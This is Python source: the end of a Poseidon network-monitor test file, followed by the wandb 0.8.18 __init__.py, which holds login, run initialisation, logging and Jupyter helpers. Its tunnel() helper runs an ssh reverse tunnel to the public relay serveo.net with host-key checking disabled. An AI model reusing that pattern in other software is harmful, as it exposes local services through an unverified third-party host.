self.poseidon_logger = Logger.poseidon_logger
self.fa_rabbit_routing_key = 'FAUCET.Event'
self.faucet_event = None
def get_q_item(self):
return (True, ('foo', {}))
def bad_get_q_item(self):
return (False, ('bar', {}))
def format_rabbit_message(self, item):
return {}
def start_vent_collector(self, endpoint_hash):
return None
def host_has_active_collectors(self, endpoint_hash):
return False
mock_monitor = MockMonitor()
mock_monitor.uss = MockUss()
mock_monitor.logger = MockLogger().logger
t1 = Thread(target=thread1)
t1.start()
mock_monitor.process()
t1.join()
answer = dict(
{
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a3': {
'state': 'UNKNOWN',
'next-state': 'MIRRORING',
'endpoint': {
'ip-address': '10.10.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'active': 1,
'name': None}},
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a4': {
'state': 'UNKNOWN',
'next-state': 'MIRRORING',
'endpoint': {
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'active': 1,
'name': None}},
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a5': {
'state': 'UNKNOWN',
'next-state': 'MIRRORING',
'endpoint': {
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'active': 0,
'name': None}},
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a6': {
'state': 'KNOWN',
'next-state': 'NONE',
'endpoint': {
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'active': 1,
'name': None}},
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a7': {
'state': 'KNOWN',
'next-state': 'REINVESTIGATING',
'endpoint': {
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'active': 1,
'name': None}},
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a8': {
'state': 'UNKNOWN',
'next-state': 'MIRRORING',
'endpoint': {
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'active': 1,
'name': None}},
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aaa': {
'state': 'KNOWN',
'next-state': 'REINVESTIGATING',
'endpoint': {
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'active': 1,
'name': None}},
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aab': {
'state': 'KNOWN',
'next-state': 'NONE',
'endpoint': {
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'active': 1,
'name': None}},
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa1': {
'state': 'KNOWN',
'next-state': 'NONE',
'endpoint': {
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'active': 1,
'name': None}},
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa2': {
'state': 'UNKNOWN',
'next-state': 'MIRRORING',
'endpoint': {
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'active': 1,
'name': None}}
})
eps = mock_monitor.uss.endpoints
for key in answer:
assert answer[key]['state'] == eps.state[key].state
assert answer[key]['next-state'] == eps.state[key].next_state
mock_monitor.get_q_item = mock_monitor.bad_get_q_item
t1 = Thread(target=thread1)
t1.start()
mock_monitor.process()
t1.join()
def test_schedule_thread_worker():
from threading import Thread
import time
def thread1():
global CTRL_C
CTRL_C['STOP'] = False
time.sleep(5)
CTRL_C['STOP'] = True
class MockLogger():
def __init__(self):
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
class mockSchedule():
def __init__(self):
pass
def run_pending(self):
pass
class mocksys():
def __init__(self):
pass
# def exit(self):
# pass
sys = mocksys()
t1 = Thread(target=thread1)
t1.start()
try:
schedule_thread_worker(mockSchedule(), MockLogger().logger)
except SystemExit:
pass
t1.join()
|
__init__.py | # -*- coding: utf-8 -*-
# Three possible modes:
# 'cli': running from "wandb" command
# 'run': we're a script launched by "wandb run"
# 'dryrun': we're a script not launched by "wandb run"
from __future__ import absolute_import, print_function
__author__ = """Chris Van Pelt"""
__email__ = 'vanpelt@wandb.com'
__version__ = '0.8.18'
import atexit
import click
import io
import json
import logging
import time
import os
import contextlib
import signal
import six
import getpass
import socket
import subprocess
import sys
import traceback
import tempfile
import re
import glob
import threading
import platform
import collections
from six.moves import queue
from six import string_types
from importlib import import_module
from . import env
from . import io_wrap
from .core import *
# These imports need to be below "from .core import *" until we remove
# 'from wandb import __stage_dir__' from api.py etc.
from wandb.apis import InternalApi, PublicApi, CommError
from wandb import wandb_types as types
from wandb import wandb_config
from wandb import wandb_run
from wandb import wandb_socket
from wandb import streaming_log
from wandb import util
from wandb.run_manager import LaunchError, Process
from wandb.data_types import Image
from wandb.data_types import Video
from wandb.data_types import Audio
from wandb.data_types import Table
from wandb.data_types import Html
from wandb.data_types import Object3D
from wandb.data_types import Histogram
from wandb.data_types import Graph
from wandb import trigger
from wandb.dataframes import image_categorizer_dataframe
from wandb.dataframes import image_segmentation_dataframe
from wandb.dataframes import image_segmentation_binary_dataframe
from wandb.dataframes import image_segmentation_multiclass_dataframe
from wandb import wandb_torch
from wandb.wandb_agent import agent
from wandb.wandb_controller import sweep, controller
from wandb.compat import windows
logger = logging.getLogger(__name__)
# Internal variables
_shutdown_async_log_thread_wait_time = 20
# this global W&B debug log gets re-written by every W&B process
if __stage_dir__ is not None:
GLOBAL_LOG_FNAME = os.path.abspath(os.path.join(wandb_dir(), 'debug.log'))
else:
GLOBAL_LOG_FNAME = os.path.join(tempfile.gettempdir(), 'wandb-debug.log')
def _debugger(*args):
import pdb
pdb.set_trace()
class Callbacks():
@property
def Keras(self):
termlog(
"DEPRECATED: wandb.callbacks is deprecated, use `from wandb.keras import WandbCallback`")
from wandb.keras import WandbCallback
return WandbCallback
callbacks = Callbacks()
def hook_torch(*args, **kwargs):
termlog(
"DEPRECATED: wandb.hook_torch is deprecated, use `wandb.watch`")
return watch(*args, **kwargs)
_global_watch_idx = 0
def watch(models, criterion=None, log="gradients", log_freq=100, idx=None):
"""
Hooks into the torch model to collect gradients and the topology. Should be extended
to accept arbitrary ML models.
:param (torch.Module) models: The model to hook, can be a tuple
:param (torch.F) criterion: An optional loss value being optimized
:param (str) log: One of "gradients", "parameters", "all", or None
:param (int) log_freq: log gradients and parameters every N batches
:param (int) idx: an index to be used when calling wandb.watch on multiple models
:return: (wandb.Graph) The graph object that will populate after the first backward pass
"""
global _global_watch_idx
if run is None:
raise ValueError(
"You must call `wandb.init` before calling watch")
log_parameters = False
log_gradients = True
if log == "all":
log_parameters = True
elif log == "parameters":
log_parameters = True
log_gradients = False
elif log is None:
log_gradients = False
if not isinstance(models, (tuple, list)):
models = (models,)
graphs = []
prefix = ''
if idx is None:
idx = _global_watch_idx
for local_idx, model in enumerate(models):
global_idx = idx + local_idx
_global_watch_idx += 1
if global_idx > 0:
# TODO: this makes ugly chart names like gradients/graph_1conv1d.bias
prefix = "graph_%i" % global_idx
run.history.torch.add_log_hooks_to_pytorch_module(
model, log_parameters=log_parameters, log_gradients=log_gradients, prefix=prefix, log_freq=log_freq)
graph = wandb_torch.TorchGraph.hook_torch(
model, criterion, graph_idx=global_idx)
graphs.append(graph)
# NOTE: the graph is set in run.summary by hook_torch on the backward pass
return graphs
def unwatch(models=None):
"""Remove pytorch gradient and parameter hooks.
Args:
models (list): Optional list of pytorch models that have had watch called on them
"""
if models:
if not isinstance(models, (tuple, list)):
models = (models,)
for model in models:
if not hasattr(model, "_wandb_hook_names"):
termwarn("%s model has not been watched" % model)
else:
for name in model._wandb_hook_names:
run.history.torch.unhook(name)
else:
run.history.torch.unhook_all()
class ExitHooks(object):
def __init__(self):
self.exit_code = 0
self.exception = None
def hook(self):
self._orig_exit = sys.exit
sys.exit = self.exit
sys.excepthook = self.exc_handler
def exit(self, code=0):
orig_code = code
if code is None:
code = 0
elif not isinstance(code, int):
code = 1
self.exit_code = code
self._orig_exit(orig_code)
def was_ctrl_c(self):
return isinstance(self.exception, KeyboardInterrupt)
def exc_handler(self, exc_type, exc, *tb):
self.exit_code = 1
self.exception = exc
if issubclass(exc_type, Error):
termerror(str(exc))
if self.was_ctrl_c():
self.exit_code = 255
traceback.print_exception(exc_type, exc, *tb)
def _init_headless(run, cloud=True):
global join
global _user_process_finished_called
environ = dict(os.environ)
run.set_environment(environ)
server = wandb_socket.Server()
run.socket = server
hooks = ExitHooks()
hooks.hook()
if platform.system() == "Windows":
try:
import win32api
# Make sure we are not ignoring CTRL_C_EVENT
# https://docs.microsoft.com/en-us/windows/console/setconsolectrlhandler
# https://stackoverflow.com/questions/1364173/stopping-python-using-ctrlc
win32api.SetConsoleCtrlHandler(None, False)
except ImportError:
termerror("Install the win32api library with `pip install pypiwin32`")
# PTYs don't work in windows so we create these unused pipes and
# mirror stdout to run.dir/output.log. There should be a way to make
# pipes work, but I haven't figured it out. See links in compat/windows
stdout_master_fd, stdout_slave_fd = os.pipe()
stderr_master_fd, stderr_slave_fd = os.pipe()
else:
stdout_master_fd, stdout_slave_fd = io_wrap.wandb_pty(resize=False)
stderr_master_fd, stderr_slave_fd = io_wrap.wandb_pty(resize=False)
headless_args = {
'command': 'headless',
'pid': os.getpid(),
'stdout_master_fd': stdout_master_fd,
'stderr_master_fd': stderr_master_fd,
'cloud': cloud,
'port': server.port
}
internal_cli_path = os.path.join(
os.path.dirname(__file__), 'internal_cli.py')
if six.PY2 or platform.system() == "Windows":
# TODO(adrian): close_fds=False is bad for security. we set
# it so we can pass the PTY FDs to the wandb process. We
# should use subprocess32, which has pass_fds.
popen_kwargs = {'close_fds': False}
else:
popen_kwargs = {'pass_fds': [stdout_master_fd, stderr_master_fd]}
# TODO(adrian): ensure we use *exactly* the same python interpreter
# TODO(adrian): make wandb the foreground process so we don't give
# up terminal control until syncing is finished.
# https://stackoverflow.com/questions/30476971/is-the-child-process-in-foreground-or-background-on-fork-in-c
wandb_process = subprocess.Popen([sys.executable, internal_cli_path, json.dumps(
headless_args)], env=environ, **popen_kwargs)
termlog('Tracking run with wandb version {}'.format(
__version__))
os.close(stdout_master_fd)
os.close(stderr_master_fd)
# Listen on the socket waiting for the wandb process to be ready
try:
success, _ = server.listen(30)
except KeyboardInterrupt:
success = False
else:
if not success:
termerror('W&B process (PID {}) did not respond'.format(
wandb_process.pid))
if not success:
wandb_process.kill()
for _ in range(20):
time.sleep(0.1)
if wandb_process.poll() is not None:
break
if wandb_process.poll() is None:
termerror('Failed to kill wandb process, PID {}'.format(
wandb_process.pid))
# TODO attempt to upload a debug log
path = GLOBAL_LOG_FNAME.replace(os.getcwd()+os.sep, "")
raise LaunchError(
"W&B process failed to launch, see: {}".format(path))
if platform.system() == "Windows":
output = open(os.path.join(run.dir, "output.log"), "wb")
stdout_redirector = io_wrap.WindowsRedirector(sys.stdout, output)
stderr_redirector = io_wrap.WindowsRedirector(sys.stderr, output)
else:
stdout_slave = os.fdopen(stdout_slave_fd, 'wb')
stderr_slave = os.fdopen(stderr_slave_fd, 'wb')
try:
stdout_redirector = io_wrap.FileRedirector(sys.stdout, stdout_slave)
stderr_redirector = io_wrap.FileRedirector(sys.stderr, stderr_slave)
except ValueError:
# stdout / err aren't files
output = open(os.path.join(run.dir, "output.log"), "wb")
stdout_redirector = io_wrap.WindowsRedirector(sys.stdout, output)
stderr_redirector = io_wrap.WindowsRedirector(sys.stderr, output)
# TODO(adrian): we should register this right after starting the wandb process to
# make sure we shut down the W&B process eg. if there's an exception in the code
# above
atexit.register(_user_process_finished, server, hooks,
wandb_process, stdout_redirector, stderr_redirector)
def _wandb_join(exit_code=None):
global _global_run_stack
shutdown_async_log_thread()
run.close_files()
if exit_code is not None:
hooks.exit_code = exit_code
_user_process_finished(server, hooks,
wandb_process, stdout_redirector, stderr_redirector)
if len(_global_run_stack) > 0:
_global_run_stack.pop()
join = _wandb_join
_user_process_finished_called = False
# redirect output last of all so we don't miss out on error messages
stdout_redirector.redirect()
if not env.is_debug():
stderr_redirector.redirect()
def load_ipython_extension(ipython):
pass
def login(anonymous=None, key=None):
"""Ensure this machine is logged in
You can manually specify a key, but this method is intended to prompt for user input.
anonymous can be "never", "must", or "allow". If set to "must" we'll always login anonymously,
if set to "allow" we'll only create an anonymous user if the user isn't already logged in.
Returns:
True if login was successful
False on failure
"""
# This ensures we have a global api object
ensure_configured()
if anonymous:
os.environ[env.ANONYMOUS] = anonymous
anonymous = anonymous or "never"
in_jupyter = _get_python_type() != "python"
if key:
termwarn("If you're specifying your api key in code, ensure this code is not shared publically.\nConsider setting the WANDB_API_KEY environment variable, or running `wandb login` from the command line.")
if in_jupyter:
termwarn("Calling wandb.login() without arguments from jupyter should prompt you for an api key.")
util.set_api_key(api, key)
elif api.api_key and anonymous != "must":
key = api.api_key
elif in_jupyter:
os.environ[env.JUPYTER] = "true"
# Don't return key to ensure it's not displayed in the notebook.
key = _jupyter_login(api=api)
else:
key = util.prompt_api_key(api)
return True if key else False
def _jupyter_login(force=True, api=None):
"""Attempt to login from a jupyter environment
If force=False, we'll only attempt to auto-login, otherwise we'll prompt the user
"""
def get_api_key_from_browser(signup=False):
key, anonymous = None, False
if 'google.colab' in sys.modules:
key = jupyter.attempt_colab_login(api.app_url)
elif 'databricks_cli' in sys.modules and 'dbutils' in sys.modules:
# Databricks does not seem to support getpass() so we need to fail
# early and prompt the user to configure the key manually for now.
termerror(
"Databricks requires api_key to be configured manually, instructions at: http://docs.wandb.com/integrations/databricks")
raise LaunchError("Databricks integration requires api_key to be configured.")
# For jupyter we default to not allowing anonymous
if not key and os.environ.get(env.ANONYMOUS, "never") != "never":
key = api.create_anonymous_api_key()
anonymous = True
if not key and force:
try:
termerror("Not authenticated. Copy a key from https://app.wandb.ai/authorize")
key = getpass.getpass("API Key: ").strip()
except NotImplementedError:
termerror(
"Can't accept input in this environment, you should set WANDB_API_KEY or call wandb.login(key='YOUR_API_KEY')")
return key, anonymous
api = api or (run.api if run else None)
if not api:
raise LaunchError("Internal error: api required for jupyter login")
return util.prompt_api_key(api, browser_callback=get_api_key_from_browser)
def _init_jupyter(run):
"""Asks for user input to configure the machine if it isn't already and creates a new run.
Log pushing and system stats don't start until `wandb.log()` is first called.
"""
from wandb import jupyter
from IPython.core.display import display, HTML
# TODO: Should we log to jupyter?
# global logging had to be disabled because it set the level to debug
# I also disabled run logging because we're rairly using it.
# try_to_set_up_global_logging()
# run.enable_logging()
os.environ[env.JUPYTER] = "true"
if not run.api.api_key:
# Fetches or prompts the users for an API key. Or if anonymode enabled, uses anonymous API key
key = _jupyter_login()
# Ensure our api client picks up the new key
if key:
run.api.reauth()
else:
run.mode = "dryrun"
display(HTML('''
<b>Could not authenticate.</b><br/>
'''))
run.resume = "allow"
if run.mode == "dryrun":
display(HTML('''
Using <a href="https://wandb.com" target="_blank">Weights & Biases</a> in dryrun mode. Not logging results to the cloud.<br/>
Call wandb.login() to authenticate this machine.<br/>
'''.format(run.api.app_url)))
else:
displayed = False
try:
sweep_url = run.get_sweep_url()
sweep_line = 'Sweep page: <a href="{}" target="_blank">{}</a><br/>\n'.format(
sweep_url, sweep_url) if sweep_url else ""
docs_html = '<a href="https://docs.wandb.com/integrations/jupyter.html" target="_blank">(Documentation)</a>'
display(HTML('''
Logging results to <a href="https://wandb.com" target="_blank">Weights & Biases</a> {}.<br/>
Project page: <a href="{}" target="_blank">{}</a><br/>
{}Run page: <a href="{}" target="_blank">{}</a><br/>
'''.format(docs_html, run.get_project_url(), run.get_project_url(), sweep_line, run.get_url(), run.get_url() )))
displayed = True
run.save()
except (CommError, ValueError) as e:
if not displayed:
display(HTML('''
Logging results to <a href="https://wandb.com" target="_blank">Weights & Biases</a>.<br/>
Couldn't load entity due to error: {}
'''.format(e.message)))
else:
termerror(str(e))
run.set_environment()
run._init_jupyter_agent()
ipython = get_ipython()
ipython.register_magics(jupyter.WandBMagics)
def reset_start():
"""Reset START_TIME to when the cell starts"""
global START_TIME
START_TIME = time.time()
ipython.events.register("pre_run_cell", reset_start)
def cleanup():
# shutdown async logger because _user_process_finished isn't called in jupyter
shutdown_async_log_thread()
run._stop_jupyter_agent()
ipython.events.register('post_run_cell', cleanup)
_user_process_finished_called = False
def _user_process_finished(server, hooks, wandb_process, stdout_redirector, stderr_redirector):
global _user_process_finished_called
if _user_process_finished_called:
return
_user_process_finished_called = True
trigger.call('on_finished')
stdout_redirector.restore()
if not env.is_debug():
stderr_redirector.restore()
termlog()
termlog("Waiting for W&B process to finish, PID {}".format(wandb_process.pid))
server.done(hooks.exit_code)
try:
while wandb_process.poll() is None:
time.sleep(0.1)
except KeyboardInterrupt:
termlog('Sending ctrl-c to W&B process, PID {}. Press ctrl-c again to kill it.'.format(wandb_process.pid))
try:
while wandb_process.poll() is None:
time.sleep(0.1)
except KeyboardInterrupt:
if wandb_process.poll() is None:
termlog('Killing W&B process, PID {}'.format(wandb_process.pid))
wandb_process.kill()
# Will be set to the run object for the current run, as returned by
# wandb.init(). We may want to get rid of this, but WandbCallback
# relies on it, and it improves the API a bit (user doesn't have to
# pass the run into WandbCallback). run is None instead of a PreInitObject
# as many places in the code check this.
run = None
config = util.PreInitObject("wandb.config") # config object shared with the global run
summary = util.PreInitObject("wandb.summary") # summary object shared with the global run
Api = PublicApi
# Stores what modules have been patched
patched = {
"tensorboard": [],
"keras": [],
"gym": []
}
_saved_files = set()
_global_run_stack = []
def join(exit_code=None):
"""Marks a run as finished"""
shutdown_async_log_thread()
if run:
run.close_files()
if len(_global_run_stack) > 0:
_global_run_stack.pop()
def save(glob_str, base_path=None, policy="live"):
""" Ensure all files matching *glob_str* are synced to wandb with the policy specified.
base_path: the base path to run the glob relative to
policy:
live: upload the file as it changes, overwriting the previous version
end: only upload file when the run ends
"""
global _saved_files
if run is None:
raise ValueError(
"You must call `wandb.init` before calling save")
if policy not in ("live", "end"):
raise ValueError(
'Only "live" and "end" policies are currently supported.')
if isinstance(glob_str, bytes):
glob_str = glob_str.decode('utf-8')
if not isinstance(glob_str, string_types):
raise ValueError("Must call wandb.save(glob_str) with glob_str a str")
if base_path is None:
base_path = os.path.dirname(glob_str)
wandb_glob_str = os.path.relpath(glob_str, base_path)
if "../" in wandb_glob_str:
raise ValueError(
"globs can't walk above base_path")
if (glob_str, base_path, policy) in _saved_files:
return []
if glob_str.startswith("gs://") or glob_str.startswith("s3://"):
termlog(
"%s is a cloud storage url, can't save file to wandb." % glob_str)
return []
run.send_message(
{"save_policy": {"glob": wandb_glob_str, "policy": policy}})
files = []
for path in glob.glob(glob_str):
file_name = os.path.relpath(path, base_path)
abs_path = os.path.abspath(path)
wandb_path = os.path.join(run.dir, file_name)
util.mkdir_exists_ok(os.path.dirname(wandb_path))
# We overwrite existing symlinks because namespaces can change in Tensorboard
if os.path.islink(wandb_path) and abs_path != os.readlink(wandb_path):
os.remove(wandb_path)
os.symlink(abs_path, wandb_path)
elif not os.path.exists(wandb_path):
os.symlink(abs_path, wandb_path)
files.append(wandb_path)
_saved_files.add((glob_str, base_path, policy))
return files
def restore(name, run_path=None, replace=False, root=None):
""" Downloads the specified file from cloud storage into the current run directory
if it doesn exist.
name: the name of the file
run_path: optional path to a different run to pull files from
replace: whether to download the file even if it already exists locally
root: the directory to download the file to. Defaults to the current
directory or the run directory if wandb.init was called.
returns None if it can't find the file, otherwise a file object open for reading
raises wandb.CommError if it can't find the run
"""
if run_path is None and run is None:
raise ValueError(
"You must call `wandb.init` before calling restore or specify a run_path")
api = Api()
api_run = api.run(run_path or run.path)
root = root or run.dir if run else "."
path = os.path.join(root, name)
if os.path.exists(path) and replace == False:
return open(path, "r")
files = api_run.files([name])
if len(files) == 0:
return None
return files[0].download(root=root, replace=True)
_tunnel_process = None
def tunnel(host, port):
"""Simple helper to open a tunnel. Returns a public HTTPS url or None"""
global _tunnel_process
if _tunnel_process:
_tunnel_process.kill()
_tunnel_process = None
process = subprocess.Popen("ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:{}:{} serveo.net".format(
host, port), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
while process.returncode is None:
for line in process.stdout:
match = re.match(r".+(https.+)$", line.decode("utf-8").strip())
if match:
_tunnel_process = process
return match.group(1)
# set returncode if the process has exited
process.poll()
time.sleep(1)
return None
def monitor(options={}):
"""Starts syncing with W&B if you're in Jupyter. Displays your W&B charts live in a Jupyter notebook.
It's currently a context manager for legacy reasons.
"""
try:
from IPython.display import display
except ImportError:
def display(stuff): return None
class Monitor():
def __init__(self, options={}):
if os.getenv(env.JUPYTER):
display(jupyter.Run())
else:
self.rm = False
termerror(
"wandb.monitor is only functional in Jupyter notebooks")
def __enter__(self):
termlog(
"DEPRECATED: with wandb.monitor(): is deprecated, add %%wandb to the beginning of a cell to see live results.")
pass
def __exit__(self, *args):
pass
return Monitor(options)
_async_log_queue = queue.Queue()
_async_log_thread_shutdown_event = threading.Event()
_async_log_thread_complete_event = threading.Event()
_async_log_thread = None
def _async_log_thread_target():
"""Consumes async logs from our _async_log_queue and actually logs them"""
global _async_log_thread
shutdown_requested = False
while not shutdown_requested:
try:
kwargs = _async_log_queue.get(block=True, timeout=1)
log(**kwargs)
except queue.Empty:
shutdown_requested = _async_log_thread_shutdown_event.wait(1) and _async_log_queue.empty()
_async_log_thread_complete_event.set()
_async_log_thread = None
def _ensure_async_log_thread_started():
"""Ensures our log consuming thread is started"""
global _async_log_thread, _async_log_thread_shutdown_event, _async_log_thread_complete_event
if _async_log_thread is None:
_async_log_thread_shutdown_event = threading.Event()
_async_log_thread_complete_event = threading.Event()
_async_log_thread = threading.Thread(target=_async_log_thread_target)
_async_log_thread.daemon = True
_async_log_thread.start()
def shutdown_async_log_thread():
"""Shuts down our async logging thread"""
if _async_log_thread:
_async_log_thread_shutdown_event.set()
res = _async_log_thread_complete_event.wait(_shutdown_async_log_thread_wait_time) # TODO: possible race here
if res is False:
termwarn('async log queue not empty after %d seconds, some log statements will be dropped' % (
_shutdown_async_log_thread_wait_time))
# FIXME: it is worse than this, likely the program will crash because files will be closed
# FIXME: py 2.7 will return None here so we dont know if we dropped data
def log(row=None, commit=True, step=None, sync=True, *args, **kwargs):
"""Log a dict to the global run's history.
wandb.log({'train-loss': 0.5, 'accuracy': 0.9})
Args:
row (dict, optional): A dict of serializable python objects i.e str: ints, floats, Tensors, dicts, or wandb.data_types
commit (boolean, optional): Persist a set of metrics, if false just update the existing dict
step (integer, optional): The global step in processing. This sets commit=True any time step increases
sync (boolean, True): If set to False, process calls to log in a seperate thread
"""
if run is None:
raise ValueError(
"You must call `wandb.init` in the same process before calling log")
run.log(row, commit, step, sync, *args, **kwargs)
def ensure_configured():
global GLOBAL_LOG_FNAME, api
# We re-initialize here for tests
api = InternalApi()
GLOBAL_LOG_FNAME = os.path.abspath(os.path.join(wandb_dir(), 'debug.log'))
def uninit(only_patches=False):
"""Undo the effects of init(). Useful for testing.
"""
global run, config, summary, patched, _saved_files
if not only_patches:
run = None
config = util.PreInitObject("wandb.config")
summary = util.PreInitObject("wandb.summary")
_saved_files = set()
# UNDO patches
for mod in patched["tensorboard"]:
module = import_module(mod[0])
parts = mod[1].split(".")
if len(parts) > 1:
module = getattr(module, parts[0])
mod[1] = parts[1]
setattr(module, mod[1], getattr(module, "orig_"+mod[1]))
patched["tensorboard"] = []
def reset_env(exclude=[]):
"""Remove environment variables, used in Jupyter notebooks"""
if os.getenv(env.INITED):
wandb_keys = [key for key in os.environ.keys() if key.startswith(
'WANDB_') and key not in exclude]
for key in wandb_keys:
del os.environ[key]
return True
else:
return False
def try_to_set_up_global_logging():
"""Try to set up global W&B debug log that gets re-written by every W&B process.
It may fail (and return False) eg. if the current directory isn't user-writable
"""
root = logging.getLogger()
root.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'%(asctime)s %(levelname)-7s %(threadName)-10s:%(process)d [%(filename)s:%(funcName)s():%(lineno)s] %(message)s')
if env.is_debug():
handler = logging.StreamHandler()
handler.setLevel(logging.DEBUG)
handler.setFormatter(formatter)
root.addHandler(handler)
try:
handler = logging.FileHandler(GLOBAL_LOG_FNAME, mode='w')
handler.setLevel(logging.DEBUG)
handler.setFormatter(formatter)
root.addHandler(handler)
except IOError as e: # eg. in case wandb directory isn't writable
termerror('Failed to set up logging: {}'.format(e))
return False
return True
def _get_python_type():
try:
if 'terminal' in get_ipython().__module__:
return 'ipython'
else:
return 'jupyter'
except (NameError, AttributeError):
return "python"
def sagemaker_auth(overrides={}, path="."):
""" Write a secrets.env file with the W&B ApiKey and any additional secrets passed.
Args:
overrides (dict, optional): Additional environment variables to write to secrets.env
path (str, optional): The path to write the secrets file.
"""
api_key = overrides.get(env.API_KEY, Api().api_key)
if api_key is None:
raise ValueError(
"Can't find W&B ApiKey, set the WANDB_API_KEY env variable or run `wandb login`")
overrides[env.API_KEY] = api_key
with open(os.path.join(path, "secrets.env"), "w") as file:
for k, v in six.iteritems(overrides):
file.write("{}={}\n".format(k, v))
def init(job_type=None, dir=None, config=None, project=None, entity=None, reinit=None, tags=None,
group=None, allow_val_change=False, resume=False, force=False, tensorboard=False,
sync_tensorboard=False, monitor_gym=False, name=None, notes=None, id=None, magic=None,
anonymous=None):
"""Initialize W&B
If called from within Jupyter, initializes a new run and waits for a call to
`wandb.log` to begin pushing metrics. Otherwise, spawns a new process
to communicate with W&B.
Args:
job_type (str, optional): The type of job running, defaults to 'train'
config (dict, argparse, or tf.FLAGS, optional): The hyper parameters to store with the run
project (str, optional): The project to push metrics to
entity (str, optional): The entity to push metrics to
dir (str, optional): An absolute path to a directory where metadata will be stored
group (str, optional): A unique string shared by all runs in a given group
tags (list, optional): A list of tags to apply to the run
id (str, optional): A globally unique (per project) identifier for the run
name (str, optional): A display name which does not have to be unique
notes (str, optional): A multiline string associated with the run
reinit (bool, optional): Allow multiple calls to init in the same process
resume (bool, str, optional): Automatically resume this run if run from the same machine,
you can also pass a unique run_id
sync_tensorboard (bool, optional): Synchronize wandb logs to tensorboard or tensorboardX
force (bool, optional): Force authentication with wandb, defaults to False
magic (bool, dict, or str, optional): magic configuration as bool, dict, json string,
yaml filename
anonymous (str, optional): Can be "allow", "must", or "never". Controls whether anonymous logging is allowed.
Defaults to never.
Returns:
A wandb.run object for metric and config logging.
"""
init_args = locals()
trigger.call('on_init', **init_args)
global run
global __stage_dir__
global _global_watch_idx
# We allow re-initialization when we're in Jupyter or explicity opt-in to it.
in_jupyter = _get_python_type() != "python"
if reinit or (in_jupyter and reinit != False):
# Reset global state for pytorch watch and tensorboard
_global_watch_idx = 0
if len(patched["tensorboard"]) > 0:
util.get_module("wandb.tensorboard").reset_state()
reset_env(exclude=env.immutable_keys())
if len(_global_run_stack) > 0:
if len(_global_run_stack) > 1:
termwarn("If you want to track multiple runs concurrently in wandb you should use multi-processing not threads")
join()
run = None
# TODO: deprecate tensorboard
if tensorboard or sync_tensorboard and len(patched["tensorboard"]) == 0:
util.get_module("wandb.tensorboard").patch()
if monitor_gym and len(patched["gym"]) == 0:
util.get_module("wandb.gym").monitor()
sagemaker_config = util.parse_sm_config()
tf_config = util.parse_tfjob_config()
if group == None:
group = os.getenv(env.RUN_GROUP)
if job_type == None:
job_type = os.getenv(env.JOB_TYPE)
if sagemaker_config:
# Set run_id and potentially grouping if we're in SageMaker
run_id = os.getenv('TRAINING_JOB_NAME')
if run_id:
os.environ[env.RUN_ID] = '-'.join([
run_id,
os.getenv('CURRENT_HOST', socket.gethostname())])
conf = json.load(
open("/opt/ml/input/config/resourceconfig.json"))
if group == None and len(conf["hosts"]) > 1:
group = os.getenv('TRAINING_JOB_NAME')
# Set secret variables
if os.path.exists("secrets.env"):
for line in open("secrets.env", "r"):
key, val = line.strip().split('=', 1)
os.environ[key] = val
elif tf_config:
cluster = tf_config.get('cluster')
job_name = tf_config.get('task', {}).get('type')
task_index = tf_config.get('task', {}).get('index')
if job_name is not None and task_index is not None:
# TODO: set run_id for resuming?
run_id = cluster[job_name][task_index].rsplit(":")[0]
if job_type == None:
job_type = job_name
if group == None and len(cluster.get("worker", [])) > 0:
group = cluster[job_name][0].rsplit("-"+job_name, 1)[0]
image = util.image_id_from_k8s()
if image:
os.environ[env.DOCKER] = image
if project:
os.environ[env.PROJECT] = project
if entity:
os.environ[env.ENTITY] = entity
if group:
os.environ[env.RUN_GROUP] = group
if job_type:
os.environ[env.JOB_TYPE] = job_type
if tags:
if isinstance(tags, str):
# People sometimes pass a string instead of an array of strings...
tags = [tags]
os.environ[env.TAGS] = ",".join(tags)
if id:
os.environ[env.RUN_ID] = id
if name is None and resume is not "must":
# We do this because of https://github.com/wandb/core/issues/2170
# to ensure that the run's name is explicitly set to match its
# id. If we don't do this and the id is eight characters long, the
# backend will set the name to a generated human-friendly value.
#
# In any case, if the user is explicitly setting `id` but not
# `name`, their id is probably a meaningful string that we can
# use to label the run.
#
# In the resume="must" case, we know we are resuming, so we should
# make sure to not set the name because it would have been set with
# the original run.
#
# TODO: handle "auto" resume by moving this logic later when we know
# if there is a resume.
name = os.environ.get(env.NAME, id) # environment variable takes precedence over this.
if name:
os.environ[env.NAME] = name
if notes:
os.environ[env.NOTES] = notes
if magic is not None and magic is not False:
if isinstance(magic, dict):
os.environ[env.MAGIC] = json.dumps(magic)
elif isinstance(magic, str):
os.environ[env.MAGIC] = magic
